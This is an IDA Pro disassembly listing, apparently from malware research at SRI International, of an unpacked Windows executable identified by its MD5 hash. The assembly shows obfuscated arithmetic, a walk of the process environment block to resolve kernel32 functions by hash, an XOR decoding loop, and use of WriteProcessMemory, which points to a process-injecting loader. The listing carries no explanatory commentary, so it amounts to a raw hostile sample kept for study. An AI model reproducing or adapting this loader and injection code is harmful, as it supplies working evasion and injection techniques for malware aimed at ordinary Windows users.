;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : 4387346EAD6B355D2C5AF1E7B1621E54
; File Name : u:\work\4387346ead6b355d2c5af1e7b1621e54_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00000366 ( 870.)
; Section size in file : 00000366 ( 870.)
; Offset to raw data for section: 00001000
; Flags 60000020: Text Executable Readable
; Alignment : default
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
dd 77DD6FC8h, 0
dword_401008 dd 7C80220Fh, 0 ; resolved to->KERNEL32.WriteProcessMemory
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near
var_1264ABB2 = byte ptr -1264ABB2h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = byte ptr -8
push ebp
shl ecx, 14h
mov ebp, esp
sub esp, 54h
mov eax, 0F3C7A752h
shl ecx, 17h
call sub_401110
mov ecx, edx
add edx, 23h
xor eax, eax
neg ecx
sub ecx, 0Dh
mov esi, edi
mov eax, 0AED2CE83h
add edi, fs:[edx+ecx+2]
lea ecx, [ebp+var_1264ABB2]
push ecx
call sub_4010B0
lea ecx, [ebp+var_18]
lea eax, [ebp+var_14]
add ecx, 8
push ecx
push eax
call sub_401130
call sub_401170
lea eax, [ebp+var_8]
push eax
shl edx, 1
mov eax, ebx
add eax, 0ED9B54AEh
push eax
add ecx, 24C95724h
push ecx
add esi, ebx
push esi
mov ecx, ebx
call sub_4011E0
push ebx
lea eax, ds:0DB76BA7Ch
lea ecx, [eax+ebx*2]
push [ebp+var_10]
push [ebp+var_14]
call ecx
mov ecx, 1264B78Ch
push ecx
lea eax, [ebp+var_14]
push eax
mov eax, 30h
call sub_4012A0
leave
retn
start endp
; ---------------------------------------------------------------------------
dw 58Dh
dd offset dword_401008
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010B0 proc near ; CODE XREF: start+35�p
push ebp
mov ebp, esp
mov ebx, eax
mov ecx, 12h
mov ebx, 15413A8h
add eax, 3EC886DCh
xor ecx, ecx
shr ebx, 2
neg esi
push esi
lea esi, [esi+edi-54F8F6h]
neg eax
lea ecx, [esi+ebx]
xor edx, edx
pop esi
add edi, esi
mov edx, eax
mov ecx, [ecx-3]
shr ecx, 18h
mov eax, ecx
add edx, ecx
lea ebx, byte_4010F8
sub edi, edx
and eax, 0Fh
add eax, ebx
push eax
retn
sub_4010B0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
byte_4010F8 db 0CCh ; DATA XREF: sub_4010B0+39�o
; ---------------------------------------------------------------------------
mov ecx, [ebp+8]
mov [ecx+edx], edx
leave
retn 4
; ---------------------------------------------------------------------------
db 8Dh
dd 40100005h, 0CCCCCC00h, 0CCCCCCCCh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401110 proc near ; CODE XREF: start+11�p
push ebp
mov ebp, esp
add eax, 0C7868B6h
xor ecx, ecx
mov edx, ecx
shl ecx, 2
push ecx
push edx
push edx
push 0
push 0
call dword ptr [eax]
leave
retn
sub_401110 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401130 proc near ; CODE XREF: start+45�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 4
shl eax, 14h
push eax
sub eax, edx
mov ecx, 0DB36C928h
lea ecx, [ecx+edx*2]
add eax, ecx
mov ecx, 0FFFFFFD8h
add ecx, [eax+edx]
mov ebx, [ebp+arg_4]
mov [ebx], ecx
sub eax, 4
mov ebx, [ebp+arg_0]
mov ecx, [eax+edx]
pop eax
add eax, 28h
add ecx, eax
mov [ebx], ecx
leave
retn 8
sub_401130 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401170 proc near ; CODE XREF: start+4A�p
push ebp
mov ebp, esp
mov ebx, edx
mov esi, 0ED9B548Eh
add esi, edx
shl esi, 11h
add esi, 0ED9B546Eh
lea ecx, [edx+edx]
neg ecx
add ecx, [esi+edx+0E0h]
leave
retn
sub_401170 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
mov ecx, [ebp+0Ch]
pop esi
mov ebx, [ebp+8]
mov edx, 3
mov eax, 0C1E7D26h
mov dword ptr [ebp-4], 0FAA8B13Ch
dec edx
loc_4011C0: ; CODE XREF: .text:004011D9�j
xor [ebx], eax
sub ecx, 4
jle short locret_4011DB
lea edi, [edx+esi]
add eax, edi
add eax, [ebp-4]
lea ebx, [ebx-1264AB8Eh]
add ebx, esi
neg edx
jmp short loc_4011C0
; ---------------------------------------------------------------------------
locret_4011DB: ; CODE XREF: .text:004011C5�j
leave
retn 0Ch
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4011E0 proc near ; CODE XREF: start+69�p
call sub_401200
call sub_401220
mov ebx, ecx
pop esi
call eax
push esi
retn
sub_4011E0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_401200 proc near ; CODE XREF: sub_4011E0�p
lea eax, [edi+ecx-512D323Eh]
mov eax, [eax+512D326Eh]
mov eax, [eax+0Ch]
mov eax, [eax+1Ch]
mov eax, [eax]
mov eax, [eax+8]
retn
sub_401200 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401220 proc near ; CODE XREF: sub_4011E0+5�p
var_24C95728 = byte ptr -24C95728h
var_8 = dword ptr -8
arg_1264AB86 = byte ptr 1264AB8Eh
push ebp
mov ebp, esp
sub esp, 8
mov ebx, eax
mov eax, ecx
lea esi, [ebx-24C956E8h]
shl eax, 1
mov esi, [esi+eax]
add eax, 0ED9B54AAh
lea esi, [ebx+eax]
sub esi, ecx
mov esi, [esi]
add esi, ebx
lea esi, [esi-1264AB1Ah]
mov esi, [esi+ecx]
add esi, ebx
lea edx, [esi+20h]
mov esi, [edx]
add esi, ebx
sub edx, 4
mov edi, [edx]
add edi, ebx
mov edx, 68651FF5h
lea eax, [ebp+arg_1264AB86]
sub edx, ecx
sub eax, ecx
mov [eax], edx
xor edx, edx
mov [ebp+var_8], edx
loc_401272: ; CODE XREF: sub_401220+74�j
mov edx, [ebp+var_8]
lea eax, [esi+edx]
mov eax, [eax]
add eax, ebx
lea eax, [eax-1264AB86h]
lea edx, [ebp+var_24C95728]
mov edx, [edx+ecx*2]
cmp edx, [eax+ecx]
jz short loc_401296
add [ebp+var_8], 4
jmp short loc_401272
; ---------------------------------------------------------------------------
loc_401296: ; CODE XREF: sub_401220+6E�j
add edi, [ebp+var_8]
mov eax, [edi]
add eax, ebx
leave
retn
sub_401220 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4012A0 proc near ; CODE XREF: start+8F�p
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_1264AB86 = byte ptr 1264AB8Eh
push ebp
mov ebp, esp
mov ecx, 0ED9B546Eh
lea ecx, [ecx+esi+0Ch]
mov edx, [ebp+ecx+0]
mov ebx, [ebp+arg_0]
add [ebx], eax
add edx, [ebx]
sub edx, esi
neg esi
push edx
lea eax, [esp+4+arg_1264AB86]
mov ecx, [ebx]
mov [eax+esi-4], ecx
call [esp+4+var_8]
leave
retn 8
sub_4012A0 endp
; ---------------------------------------------------------------------------
align 4
dd 1318h, 2 dup(0)
dd 1336h, 1008h, 1310h, 2 dup(0)
dd 1358h, 1000h, 5 dup(0)
dd 1344h, 0
dd 1320h, 0
db 0ADh ;
db 3, 57h, 72h
aIteprocessmemo db 'iteProcessMemory',0
align 2
aKernel32_dll db 'KERNEL32.dll',0
align 4
dd 655201F8h, 65755167h, 61567972h, 4565756Ch, 5778h, 41564441h
dd 32334950h, 6C6C642Eh
db 2 dup(0)
dw ?
dd 26h dup(?)
_text ends
; Section 3. (virtual address 00007000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00006E00
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 407000h
align 2000h
_idata2 ends
end start